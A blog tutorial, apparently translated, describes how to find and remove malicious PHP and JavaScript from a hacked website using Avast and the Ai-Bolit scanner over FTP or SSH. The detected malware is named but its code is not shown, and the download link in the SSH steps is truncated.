At first I tried the second way myself, and I will describe it. Once all the files (or the archive) were downloaded to the computer, and there were no fewer than 25,000 of them, I opened Avast and pointed it at the folder with the site files to check them for malicious scripts.

After Avast scanned the files in the site folder, two script viruses were found:

  • php-shell-jv
  • js-redirector-fc

The index.php file contained the following code:

The javascript file "ui.datepicker_old.js" had malicious code at the very bottom of the script. This code needs to be removed!

Cleaning the site of viruses with Ai-Bolit.

FTP method.

1. Download the archive with the Aibolit script to the local computer and unpack it.

2. Connect via FTP with the FileZilla client.

3. Upload the unpacked files to the site's main directory /home/your site/public_html

4. Run the script: http://your domain/ai-bolit.php

5. A report file named AI-BOLIT-REPORT.html will be created in the main directory.

If a blank white screen appears when the script is launched, the PHP version on the hoster's server is not suitable for Aibolit.

Note! To check all sites in the directory at once, upload the script to the folder /home/domains/ or /home/; Ai-Bolit will then recursively go through all the folders and produce a report, but I think it is easier to check one domain at a time.

Console option (SSH)

1. Run Putty or another console program.

2. Connect to the server with the host name and password.

3. Go to the site's main directory with the command cd /home/your login/your site/public_html/

4. Download the script with the command wget http://www..zip

5. Unpack the zip archive with the command unzip 20160904_112415ai-bolit.zip

6. Run the script: php ai-bolit.php

To run it in the background use the command: screen -d -m php ai-bolit.php

7. Wait until the script finishes checking, then download the report "AI-BOLIT-REPORT.html" from the server.

Also note: if your server has a PHP version below 5.3, Aibolit will show an error and will not start the scan. In my case I had to download the site and check it on my own server.

Once the report file is created on the server, download it to your computer and view it in any browser (Chrome, Firefox, etc.).

First of all pay attention to the report section "Malicious scripts"; then either carefully examine those files or clean them manually, as I described.

© 2022 androidas.ru - All about Android